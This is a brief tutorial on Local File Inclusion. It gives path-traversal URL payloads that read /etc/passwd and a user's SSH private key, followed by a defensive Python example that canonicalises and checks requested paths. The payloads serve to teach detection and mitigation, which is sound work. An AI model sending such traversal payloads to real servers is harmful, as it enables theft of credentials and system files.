# Local File Inclusion

To test for LFI, we need a parameter in a URL or in another input field, such as the request body. For example, if the website is tryhackme.com, a URL with a parameter can look like `https://tryhackme.com/?file=robots.txt`. Here `file` is the name of the parameter and `robots.txt` is the value we are passing (include the file `robots.txt`).

## Usage

* Exploit URL parameter

```
http://example.com/home?page=about.html
```

* Changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)

```
http://example.com/home?page=../../../../etc/passwd
```

or

```
http://example.com/home?page=../../../../home//.ssh/id_rsa
```
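
On the server side, the traversal values above are stopped by canonicalising the requested path and checking that it still lies under the content directory. The following is an added Python example, not code from the original page; the function names, the `pages` directory and the sample file tree are assumptions constructed for illustration.

```python
import os
import tempfile

def resolve_naive(base_dir, page):
    # Vulnerable pattern: the parameter is joined to the base directory unchecked.
    return os.path.normpath(os.path.join(base_dir, page))

def resolve_safe(base_dir, page):
    # Return the canonical path only if it stays inside base_dir.
    if "\x00" in page:
        raise ValueError("null byte in parameter")
    base = os.path.realpath(base_dir)
    # realpath collapses ../ sequences and follows symlinks before the check.
    target = os.path.realpath(os.path.join(base, page))
    # commonpath compares whole components, so /srv/pages-old is not /srv/pages.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory")
    if not os.path.isfile(target):
        raise FileNotFoundError(page)
    return target

def demo():
    # Constructed sample tree: <tmp>/pages/about.html plus a file outside pages/.
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "pages")
        os.mkdir(base)
        with open(os.path.join(base, "about.html"), "w") as f:
            f.write("<h1>About</h1>")
        with open(os.path.join(root, "secret.txt"), "w") as f:
            f.write("outside the web root")
        os.symlink(root, os.path.join(base, "link"))  # symlink pointing out of pages/
        samples = ["about.html", "../../../../etc/passwd", "/etc/passwd",
                   "link/secret.txt", "about.html\x00.png"]
        for page in samples:
            try:
                resolve_safe(base, page)
                results[page] = "served"
            except (ValueError, FileNotFoundError):
                results[page] = "rejected"
        naive = resolve_naive(base, "../../../../etc/passwd")
        results["naive_escapes"] = os.path.commonpath([base, naive]) != base
    return results

if __name__ == "__main__":
    for page, outcome in demo().items():
        print(repr(page), outcome)
```

Only `about.html` is served; the relative traversal, the absolute path, the symlink that points out of the directory and the null-byte value are all rejected, while the unchecked join resolves to a path outside `pages`.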